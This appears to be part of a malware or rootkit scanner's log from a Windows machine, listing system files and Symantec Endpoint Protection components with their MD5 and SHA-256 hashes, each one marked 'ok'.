15:34:00.0201 0x04bc  [ 2C81B3274596D70186EAE21792723932, 74C8308776D3A9C8DBF19606B2C873C76A6B1894976EEF181FF1AA78DE7F52DA ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\TseRes.dll
15:34:00.0201 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\TseRes.dll - ok
15:34:00.0203 0x04bc  [ E4C1411A746B8AD0CB340BDF9C0353CB, A08E62BDE18FFE4EC4074C8FCAD62FACC769AD671ACCFF684D41B89198D5343C ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SymNeti.dll
15:34:00.0203 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SymNeti.dll - ok
15:34:00.0205 0x04bc  [ CA5DC83465810CB556CD563CB7C376E5, 02898F84C65766FEC4A47C806F95070DA99BE60837166D754A098F9A0312BDF5 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\ccGEvt.dll
15:34:00.0205 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\ccGEvt.dll - ok
15:34:00.0207 0x04bc  [ F1C09EE3A594B19DD1F4B4AEA9E353C9, 4F83F366F50CE1C8143CA7855EE8BDEAEF29EBAF76CF1C67B244D03AE4F8D438 ] C:\Windows\System32\comsvcs.dll
15:34:00.0207 0x04bc  C:\Windows\System32\comsvcs.dll - ok
15:34:00.0209 0x04bc  [ A8EDB86FC2A4D6D1285E4C70384AC35A, 61B8955CE0A2AA9D0719920B30216717B349B6FBE11C697C31CFA84F859CC1AE ] C:\Windows\System32\dllhost.exe
15:34:00.0209 0x04bc  C:\Windows\System32\dllhost.exe - ok
15:34:00.0211 0x04bc  [ 218A400108F280428FA22282D3268BBC, 7712687ABAEF6616E90AE5A321044C102E79EC23F4A1EAFB4278C93724873CB3 ] C:\Windows\System32\wscapi.dll
15:34:00.0211 0x04bc  C:\Windows\System32\wscapi.dll - ok
15:34:00.0213 0x04bc  [ B84E2D174DC84916A536572BB8F691A8, 94E3D68F102439D3A585D2D796F3F3FC27CB41C640058DDC14AF99A723B2CD99 ] C:\Windows\System32\wscisvif.dll
15:34:00.0213 0x04bc  C:\Windows\System32\wscisvif.dll - ok
15:34:00.0215 0x04bc  [ 6C1E3C43B35268C17833244C8ED96430, 9C571AA762E71177B6FF486D1DB500E3530E13CAFD87316AD2C64F5A55EB4A93 ] C:\Windows\System32\wscproxystub.dll
15:34:00.0215 0x04bc  C:\Windows\System32\wscproxystub.dll - ok
15:34:00.0217 0x04bc  [ 74E3E02D75A08D985BE0B7B7977CBE4E, 66092ECE17F6D9CD6498B913D62E80C61F16CF88E9886A2A40EB92396538A66A ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\SyLinkRes.dll
15:34:00.0217 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\SyLinkRes.dll - ok
15:34:00.0218 0x04bc  [ B079C2629E54EF8C82F3644CE6C9BFFC, 43E4BAC336EBDB1A922505DEAD48F2B39ABC3ECA1EE0E2C00FF58BD6DD0996EE ] C:\Windows\System32\adsldp.dll
15:34:00.0218 0x04bc  C:\Windows\System32\adsldp.dll - ok
15:34:00.0220 0x04bc  [ F5CEF064C7E6D95DA86B9D064A56A969, F118CD4364690F37A07AE458E043E8CFBA98F332DC9E7228C83409CF26F6EF6D ] C:\Windows\System32\api-ms-win-downlevel-advapi32-l2-1-0.dll
15:34:00.0220 0x04bc  C:\Windows\System32\api-ms-win-downlevel-advapi32-l2-1-0.dll - ok
15:34:00.0222 0x04bc  [ 45C67FE413DFDE7B1E2141F3255EA3AA, FBBDB1074719B8A8D0B86B476250026CB5E350CAA3A091304D1370102C006CB4 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SmcImpl.dll
15:34:00.0222 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SmcImpl.dll - ok
15:34:00.0224 0x04bc  [ A0A2C1D812C231C9BFE119FDC68E341B, F94446594EE17505956A715DFB28B51D09F00A7A65E56950661B889A57DE8FA8 ] C:\Windows\System32\IDStore.dll
15:34:00.0224 0x04bc  C:\Windows\System32\IDStore.dll - ok
15:34:00.0225 0x04bc  [ 5F639198C4137075DA50E61C23963C11, 3D03B3BF62B3469069AD6BE2AAEE152CB6722D36C001B8197FEBC2F3EB9ADBE0 ] C:\Windows\System32\drprov.dll
15:34:00.0225 0x04bc  C:\Windows\System32\drprov.dll - ok
15:34:00.0227 0x04bc  [ 3AB9D1095B482A54A33828BFF4590442, B837B4B86420949009659494366669B07E1F6E7F2A47356C3F631D5060FC8EB0 ] C:\Windows\System32\davclnt.dll
15:34:00.0227 0x04bc  C:\Windows\System32\davclnt.dll - ok
15:34:00.0229 0x04bc  [ 45B24A357C801CE62052FE0CDC8BD4D2, 00602E41B78473825253F6B2557A5C43FBDDCCF713D806929AE7C039FF8F185C ] C:\Windows\System32\davhlpr.dll
15:34:00.0229 0x04bc  C:\Windows\System32\davhlpr.dll - ok
15:34:00.0231 0x04bc  [ BC566D17914B07ABAAB3A5A385CC3300, DCE0A1D26312AA6441FB7122C6EED980AE350D58B2B4B166CB62F983306268E9 ] C:\Windows\System32\ntlanman.dll
15:34:00.0231 0x04bc  C:\Windows\System32\ntlanman.dll - ok
15:34:00.0232 0x04bc  [ FC633FEA9DA3E479EA73A542B51F41D1, AD4FE805EC08241032284526E7C620D087CACDAB772B89A97E90C3C701B229E1 ] C:\Windows\System32\gpprefcl.dll
15:34:00.0233 0x04bc  C:\Windows\System32\gpprefcl.dll - ok
15:34:00.0234 0x04bc  [ 1369DF1AA12A11876B41627099923EDB, 5C7EC61A664EDA85DF713DDCE6EDD7F0B6453AE75D3DA84DBE2606936BE6D6BE ] C:\Windows\System32\dfscli.dll
15:34:00.0234 0x04bc  C:\Windows\System32\dfscli.dll - ok
15:34:00.0236 0x04bc  [ 19F4CFCF0B8EF9E42C5F97C97663E1A7, 7336D733F2F9360BF43D0A33F6D4476450A63032FBD4EB4BDDD546C95F432938 ] C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20141106.004\cceraser.dll
15:34:00.0236 0x04bc  C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20141106.004\cceraser.dll - ok
15:34:00.0238 0x04bc  [ 7860BD03A96C99776135AE16EEC2C690, 3C609FA417AC611DB835B83CD7BBD3DE4028B87D3384309E82789B60CF051CB3 ] C:\Windows\SysWOW64\nlaapi.dll
15:34:00.0238 0x04bc  C:\Windows\SysWOW64\nlaapi.dll - ok
15:34:00.0240 0x04bc  [ 0B7E85364CB878E2AD531DB7B601A9E5, F5AD3018427F1CD68450EE5CB55AA9572546322580E0FB1E7888702A291C2380 ] C:\Windows\SysWOW64\NapiNSP.dll
15:34:00.0240 0x04bc  C:\Windows\SysWOW64\NapiNSP.dll - ok
15:34:00.0242 0x04bc  [ 5CF640EDDB1E40A5AB1BB743BCDEC610, 0313AA3F713C9F5B84DBB0B4DE78A96B173E9F7B4CF61C10FDC7DAE952DB04E5 ] C:\Windows\SysWOW64\pnrpnsp.dll
15:34:00.0242 0x04bc  C:\Windows\SysWOW64\pnrpnsp.dll - ok
15:34:00.0243 0x04bc  [ 5DF5D8CFD9B9573FA3B2C89D9061A240, 990EA273B640DF2D7E800C0CFF18550259C605A4951CD82CD9F1E7B6FF0C9533 ] C:\Windows\SysWOW64\winrnr.dll
15:34:00.0243 0x04bc  C:\Windows\SysWOW64\winrnr.dll - ok
15:34:00.0245 0x04bc  [ AC122407B29378FF9646F03404AC7C54, 01F03A11C4419665557C3CB7E712B8AD59B13703115CB10C9F39FBE82D177BE6 ] C:\Windows\SysWOW64\wshbth.dll
15:34:00.0245 0x04bc  C:\Windows\SysWOW64\wshbth.dll - ok
15:34:00.0247 0x04bc  [ 94EEAC26F57811BD1AEFC164412F7FCE, 7390BCD7709D48DE75D7D6E06AA7356D1C58EE63F3CC2E07ABCD2E2FF6CC81CF ] C:\Windows\System32\PlaySndSrv.dll
15:34:00.0247 0x04bc  C:\Windows\System32\PlaySndSrv.dll - ok
15:34:00.0249 0x04bc  [ 03E1B8BA59327D186C7C533A6998FEF9, 224937A697B55BD9CCD790771DBE9D135021AD1DC3E6D6AC7C431C56F0FFBBB5 ] C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20141106.004\eeCtrl64.sys
15:34:00.0249 0x04bc  C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20141106.004\eeCtrl64.sys - ok
15:34:00.0251 0x04bc  [ 9BB99503D6A4DD62569EDE9E5E2672A5, 6F4EA5BC50B1F929735246485263078BEF1B3BEB33F78CB1F483F13AA226C27E ] C:\Windows\System32\HotStartUserAgent.dll
15:34:00.0251 0x04bc  C:\Windows\System32\HotStartUserAgent.dll - ok
15:34:00.0253 0x04bc  [ 1F1CA9E99DD5BF918BE0BF30B5A42FDA, 8A6ACEFAB95E5275CBFBE6CCB5A6C3A6A471260B279B9063E86B9C7765E18656 ] C:\Windows\System32\MsCtfMonitor.dll
15:34:00.0253 0x04bc  C:\Windows\System32\MsCtfMonitor.dll - ok
15:34:00.0255 0x04bc  [ F09A9A1AD21FE618C4C8B0A0D830C886, 29831DDAB2AB105358FBC067CDF96428220B6743CD6019F6FE74BAC7AF325E7E ] C:\Windows\System32\msutb.dll
15:34:00.0255 0x04bc  C:\Windows\System32\msutb.dll - ok
15:34:00.0257 0x04bc  [ BAFE84E637BF7388C96EF48D4D3FDD53, 11C194D9ADCE90027272C627D7FBF3BA5025FF0F7B26A8333F764E11E1382CF9 ] C:\Windows\System32\userinit.exe
15:34:00.0257 0x04bc  C:\Windows\System32\userinit.exe - ok
15:34:00.0259 0x04bc  [ 796F8E8C368AF97FF4EC7E7A5A0D8E66, DF84513B432022D43683EAAC4E028AFE6DD5C5BF262CC7F37CAB7E78B8AAD659 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\rtvscanPS.dll
15:34:00.0259 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\rtvscanPS.dll - ok
15:34:00.0261 0x04bc  [ 0F0A40B96228EEB6C6ADF9E210D96CD9, D494BEA82A0EDE4881E3940811AF5C68FA8E5D4E0ABAF96B9BD57243253DF741 ] C:\Windows\System32\atiuxp64.dll
15:34:00.0261 0x04bc  C:\Windows\System32\atiuxp64.dll - ok
15:34:00.0263 0x04bc  [ BFCFDF4844B59A6D4B8090674787E592, 38E491E86BFB836AD72140085CABF6F3598D6D61D8B3E74F2AC4E3EF32F148AC ] C:\Windows\System32\atidxx64.dll
15:34:00.0263 0x04bc  C:\Windows\System32\atidxx64.dll - ok
15:34:00.0265 0x04bc  [ EEB6E0484B261087245F5918F0EBE8BE, 2386F39ABA281A81358EF15A3EE7B1C6B2DA4AA8019968D0444F488610A77ABD ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\LueEimRes.dll
15:34:00.0265 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\LueEimRes.dll - ok
15:34:00.0267 0x04bc  [ 49E5753D923F1AC63B22D3DCB0B47E00, 14CEC0BF5F625FF839A8D79B4A6B7C4AC0CBB705FD197C6B7FF8617C6C3E34FE ] C:\Windows\System32\uDWM.dll
15:34:00.0267 0x04bc  C:\Windows\System32\uDWM.dll - ok
15:34:00.0269 0x04bc  [ 44AF3695F5581FA3CA688FA274539A36, 92B78AED63858E5F57DD756A0B71614FD4174621C6F357CCFF75613B3708175F ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\LuCtl.dll
15:34:00.0269 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\LuCtl.dll - ok
15:34:00.0271 0x04bc  [ 6C458D501E70BD69D160F076C42468A5, F859C635A72E40CD3B5E773B511C661BCABC7D754166DA49A098D203C25C437D ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\rtvscanPS64.dll
15:34:00.0271 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\rtvscanPS64.dll - ok
15:34:00.0273 0x04bc  [ D701E1FFD8306A1F9A884B5879B844D8, 4F1D8C49DFB8E7D94ABC4B6EB81D9EE0F9EB1A88D6BB73B5C8435E03DAAFE51E ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\LuEng.dll
15:34:00.0273 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\LuEng.dll - ok
15:34:00.0275 0x04bc  [ B9274CDEAD3DDB17B5C3D0D5A6EA46F1, C5120F9A09BC9FA48B07E95A344CE555DE910367B1F3EA1A16DB48688C0CBC03 ] C:\Windows\System32\wbem\WMIPIPRT.dll
15:34:00.0275 0x04bc  C:\Windows\System32\wbem\WMIPIPRT.dll - ok
15:34:00.0277 0x04bc  [ F162D5F5E845B9DC352DD1BAD8CEF1BC, 8A7B7528DB30AB123B060D8E41954D95913C07BB40CDAE32E97F9EDB0BAF79C7 ] C:\Windows\System32\dwm.exe
15:34:00.0277 0x04bc  C:\Windows\System32\dwm.exe - ok
15:34:00.0279 0x04bc  [ 5AAF10198FFBD79E7F022625FEDB79B7, BF8DB296AE67939A0860752A2B216EB9072CE67A4088CC084CAA11BA1F74FDEA ] C:\Windows\System32\provthrd.dll
15:34:00.0279 0x04bc  C:\Windows\System32\provthrd.dll - ok
15:34:00.0280 0x04bc  [ B9A8CBCFCD3EC9D2EA4740AF347BF108, 97FA304E3880BC863D999F441AE47CB8ADF00D2DEC2A52ACD8FBD02CC096786A ] C:\Windows\SysWOW64\mpr.dll
15:34:00.0280 0x04bc  C:\Windows\SysWOW64\mpr.dll - ok
15:34:00.0282 0x04bc  [ 2986F2B8E85AF015B9B85756EADDCEAD, FD2C6B508B9F244A00BDE14E56023A4B31DBF31C5CBA5BC66904787541A5A7D1 ] C:\Windows\System32\msvcirt.dll
15:34:00.0282 0x04bc  C:\Windows\System32\msvcirt.dll - ok
15:34:00.0284 0x04bc  [ E36112A8A6C7F840169A7E92C12F4203, 52795B2E6ECCE751EEF5074AF52FDE376A382D0A1C43B90DD4F77A397C00FBC5 ] C:\Windows\System32\wsock32.dll
15:34:00.0284 0x04bc  C:\Windows\System32\wsock32.dll - ok
15:34:00.0286 0x04bc  [ 07E47DF3FA49615663A36C888FD53799, 182FE4918591D539988092AED453604E5A3A9474AA9F11D251933020F8E1A58C ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SyLink.dll
15:34:00.0286 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SyLink.dll - ok
15:34:00.0288 0x04bc  [ 332FEAB1435662FC6C672E25BEB37BE3, 6BED1A3A956A859EF4420FEB2466C040800EAF01EF53214EF9DAB53AEFF1CFF0 ] C:\Windows\explorer.exe
15:34:00.0288 0x04bc  C:\Windows\explorer.exe - ok


15:34:00.0288 0x04bc  [ 405F4D32D2185F1F1BD753D8EEAFFB3A, CAC42C3E09C43BE96592B670D70821386014DB22D8239A9CFB9E33E54FB5C3D5 ] C:\Windows\System32\networkexplorer.dll
15:34:00.0288 0x04bc  C:\Windows\System32\networkexplorer.dll - ok
15:34:00.0290 0x04bc  [ FCFCD1101C5DA23B4B95F93D02B2C169, 040A086875B6C5475490A2F8B0CF4FF20DDB4FEDFE5FCABBA49692AA05F40527 ] C:\Windows\System32\dwmredir.dll
15:34:00.0290 0x04bc  C:\Windows\System32\dwmredir.dll - ok
15:34:00.0292 0x04bc  [ 4BA77A5EF71C14C764B0ED4701683E3E, 066A064CDBE09BF8BE1DF5B259F30FF6C124A1C3D637800D3E19E8E25EDB950E ] C:\Windows\System32\dwmcore.dll
15:34:00.0292 0x04bc  C:\Windows\System32\dwmcore.dll - ok
15:34:00.0294 0x04bc  [ 9AE80F6A66B30E3ED8CDF858CF28B11B, A93E470DC54E3C74C10979D49CABB9A34893F9E847F88491F935DB44EEC3541A ] C:\Windows\System32\d3d10_1.dll
15:34:00.0294 0x04bc  C:\Windows\System32\d3d10_1.dll - ok
15:34:00.0296 0x04bc  [ 724AA4BF76905BE0404656B09E502B55, 8B6FB823CD4004A8D8FA2FCD89EC1283B9DDFADF4B3912167C5ACBFBB1DDD8D4 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SyLog.dll
15:34:00.0296 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SyLog.dll - ok
15:34:00.0298 0x04bc  [ A807596CB3CB377A1A687C9734D67A37, 496E1A21645ABAA90FA544C025E6F0DE1CBCBD5D060007A8A9E2FB5787655D0E ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\mfc100.dll
15:34:00.0298 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\mfc100.dll - ok
15:34:00.0300 0x04bc  [ 63F72417CA38D8FC8F53709649B589E3, 39AE8AFFCFB8A9E345FC4C6F11926F25552C464380F88CDECD299FD27AF7866B ] C:\Windows\System32\d3d10_1core.dll
15:34:00.0300 0x04bc  C:\Windows\System32\d3d10_1core.dll - ok
15:34:00.0301 0x04bc  [ 8DFB5752FCE145A6B295093C0A8BE131, F38029C8B36EFD46B1F6CCA0089FF4EFB0AB246497E38EDFF6A67FAC804D4A97 ] C:\Windows\System32\dxgi.dll
15:34:00.0301 0x04bc  C:\Windows\System32\dxgi.dll - ok
15:34:00.0303 0x04bc  [ 4C92EB7535CAA1681A77D928FBF9771F, 7D02B2357CA02393CA711C3C499AAD86B792EEFFDC67F2CE52F7F7BB8A28DE79 ] C:\Windows\System32\d3d11.dll
15:34:00.0303 0x04bc  C:\Windows\System32\d3d11.dll - ok
15:34:00.0305 0x04bc  [ 863F793D15B4026B1A5FDECA873D4D84, AF7ABD95BB5467551562F129F03C7AC9D52A021F7E547609F40A80E66932C942 ] C:\Windows\SysWOW64\apphelp.dll
15:34:00.0305 0x04bc  C:\Windows\SysWOW64\apphelp.dll - ok
15:34:00.0307 0x04bc  [ 96AB47F96A09F5279558B4B5285C15A9, 5A4C73930E6CBCFFC2465F3E5D41AF8015D77F351FE3A520433FCFE78393D669 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\OutlookSessionPlugin.dll
15:34:00.0307 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\OutlookSessionPlugin.dll - ok
15:34:00.0310 0x04bc  [ 3F5263BB46D5A66719CA3DC44924183A, E7CC750F7BE929BC31954AA45F63F8DCAD2B133E2AC237DEB5472FB7A2265241 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\RunOnceSessionPlugin.dll
15:34:00.0310 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\RunOnceSessionPlugin.dll - ok
15:34:00.0312 0x04bc  [ 0B1C7CFF3F84BA182F9DEE3CDA4BEDEC, 6583FE55BAD6715738BA5E624B09D028D3A8CE1EC77755AA739B8D0C6335749E ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SavEmailSesHlp.dll
15:34:00.0312 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SavEmailSesHlp.dll - ok
15:34:00.0314 0x04bc  [ ECA263BA313CBACF37937DE1934173B5, 34CF603E3C77387BA25E195608C4C614F47B411E80EA623758884ACF9517E63C ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SAVSesHlp.dll
15:34:00.0314 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SAVSesHlp.dll - ok
15:34:00.0316 0x04bc  [ 7F653C0FC65A1E125218D3F6A62CA4E1, 39389392DC787778101FA932B4CEC77D3165C953AD6F5D62C911C20A316E4F55 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SAVStatusFinder.dll
15:34:00.0316 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SAVStatusFinder.dll - ok
15:34:00.0318 0x04bc  [ 95A7E85C0E9366E79999D055665C5770, 6D946AE89D146087B3ED7BDCCCDA0FF7274AC42AAB5C06CAA591573831B3235D ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\SAVSesHlpRes.dll
15:34:00.0318 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\SAVSesHlpRes.dll - ok
15:34:00.0320 0x04bc  [ CF56D418F2EF133C03187BB7AB91C7E0, FAD3C78C35F471AFD607142B44E802FA36830615550C6927C84085AF2FCCA764 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\SavEmailSesHlpRes.dll
15:34:00.0320 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\SavEmailSesHlpRes.dll - ok
15:34:00.0323 0x04bc  [ DE72E32FA1CE869873F0766C86150B68, FABC1F0206666C8D98E2B9341BD9C38DBF467B7CD015C901FC312E794B643828 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SEPSessionPlugin.dll
15:34:00.0323 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SEPSessionPlugin.dll - ok
15:34:00.0325 0x04bc  [ 4A084A3F5CC1E0CA655DD5B01B438708, 62A818214A45229E39B4869357E2A37936F524F0DAE110A5DBBF7E3633543FB4 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\SEPSessionPluginRes.dll
15:34:00.0325 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\SEPSessionPluginRes.dll - ok
15:34:00.0327 0x04bc  [ A0C153B2B2388CCFF5F63E585AB5DD9A, F669A17C77818F515F18DC46E48FC810736106646F3B27A32B7A6AC9865252F7 ] C:\Windows\System32\spool\drivers\x64\3\CNLB0M_DBB31.DLL
15:34:00.0327 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CNLB0M_DBB31.DLL - ok
15:34:00.0329 0x04bc  [ 0147DE9B1C648DBD14505D8A9418A7B0, B48F3AB4B1848A2C6B71353BB0560FEA0069F2AA35EFFF64DE540885940F2881 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\AVUtil.dll
15:34:00.0329 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\AVUtil.dll - ok
15:34:00.0332 0x04bc  [ FDB3D6601665C98607784696F6190174, E9B4B92EA5C48139BB88DC500218D65549DA3FD3F474539D44DEDB1A33F9973C ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ProtectionUtil.dll
15:34:00.0332 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ProtectionUtil.dll - ok
15:34:00.0334 0x04bc  [ 00D2C06A552F782C1F16ACF77DB765A5, F54FE6535538174C139B1B0CB2AC0753B2E34412153A443482CCAE53FFBC4DC6 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\atl100.dll
15:34:00.0334 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\atl100.dll - ok
15:34:00.0336 0x04bc  [ 38EC48993AC89B86F3EC0A5C1CDF0FC5, 473FE351520CE4C1F0E836A0D361800B53BDAB23782C8FA47507CADDE51A552B ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\LicenseManRes.dll
15:34:00.0336 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\LicenseManRes.dll - ok
15:34:00.0338 0x04bc  [ D5F26AAAD0ABFE61182A482F8C43546B, AA7D414DECE0464294AD59CA7308305A7693416E40F1A5E4ED93871565C99BF4 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\ProtectionUtilRes.dll
15:34:00.0339 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\ProtectionUtilRes.dll - ok
15:34:00.0341 0x04bc  [ 9F334218E6BFEBD111F438363F90344E, A870C34C290BC08AE6A8ACFF137DF02BCC3201296F74A841E1337733E65AB6A5 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\RebootMgrEimProxy.dll
15:34:00.0341 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\RebootMgrEimProxy.dll - ok
15:34:00.0343 0x04bc  [ CD341249E1267240A2198A8427B416FF, 462EA457DEBF5E941056683B00B496E44C57BE50942B9580864E47D58EC521A3 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\HITrayStatus.dll
15:34:00.0343 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\HITrayStatus.dll - ok
15:34:00.0345 0x04bc  [ D9ACD62AA42DD5C8BEE35D2A90F5EC26, 5A600B38FE753BFF198BD9BABF12A552FCB568945E3DC30FFDA49B0D005DDE75 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ProtectionProviderPS.dll
15:34:00.0345 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ProtectionProviderPS.dll - ok
15:34:00.0347 0x04bc  [ 294F32307FF9D088980B5309FF62C6B0, EEED61175296153418FA61F57135453E7EA208EB597093D72C4CE1B5B487C989 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SavMainUI.dll
15:34:00.0347 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SavMainUI.dll - ok
15:34:00.0350 0x04bc  [ A4B268D83119C44E4C524182FE14AC61, F126E393747B9DB19C1A504FC0FE245BD788305E1F80E5BDD1D76867606F8A28 ] C:\Windows\System32\spool\drivers\x64\3\CNLB0MUI_DBB31.DLL
15:34:00.0350 0x04bc  C:\Windows\System32\spool\drivers\x64\3\CNLB0MUI_DBB31.DLL - ok
15:34:00.0352 0x04bc  [ 65EA57712340C09B1B0C427B4848AE05, 5FDCF73191BFF9DBB03886755FFCF0BC15849F0E216884A5A8B9BB375FA7C1A5 ] C:\Windows\System32\taskeng.exe
15:34:00.0352 0x04bc  C:\Windows\System32\taskeng.exe - ok
15:34:00.0353 0x04bc  [ 805A52C5AE26C28E88FDD9BCCFE6F312, 4FF28D3658C31722B7DD036DED9D544B14841C0E0B94D31A8EC5AB92128DA020 ] C:\Windows\System32\TSChannel.dll
15:34:00.0353 0x04bc  C:\Windows\System32\TSChannel.dll - ok
15:34:00.0355 0x04bc  [ 51508F0C2476177E50C31B0BBFBF1BDB, 3F62A05181D54711180C8727AC66D624AFA7FC816A4ACC4DC0CFCF2D2DBE7F87 ] C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
15:34:00.0355 0x04bc  C:\Program Files (x86)\Google\Update\GoogleUpdate.exe - ok
15:34:00.0358 0x04bc  [ C99F021295C52D08961C9298F2DF2F61, 3E02907AD84FCFAD57C5799B1DCF81CF92B98441572B4E89F5E8D2316BDFB983 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\CIdsEimRes.dll
15:34:00.0358 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Res\1033\CIdsEimRes.dll - ok
15:34:00.0360 0x04bc  [ 83D55B921EED21E619E9CEEDC66F1442, 2F9D2F6CD5FC252299A4ACAB13D3416A561639864A097F7DFF2B096DF2100498 ] C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SEPPolicyMonitor.dll
15:34:00.0360 0x04bc  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\SEPPolicyMonitor.dll - ok
15:34:00.0362 0x04bc  [ EED05D42D91835064703E2318552ED25, E9EE1E2253445B207B76F5D3073C612ED979A982522C1515E0FE8FA9641AE568 ] C:\Windows\System32\ExplorerFrame.dll
15:34:00.0362 0x04bc  C:\Windows\System32\ExplorerFrame.dll - ok
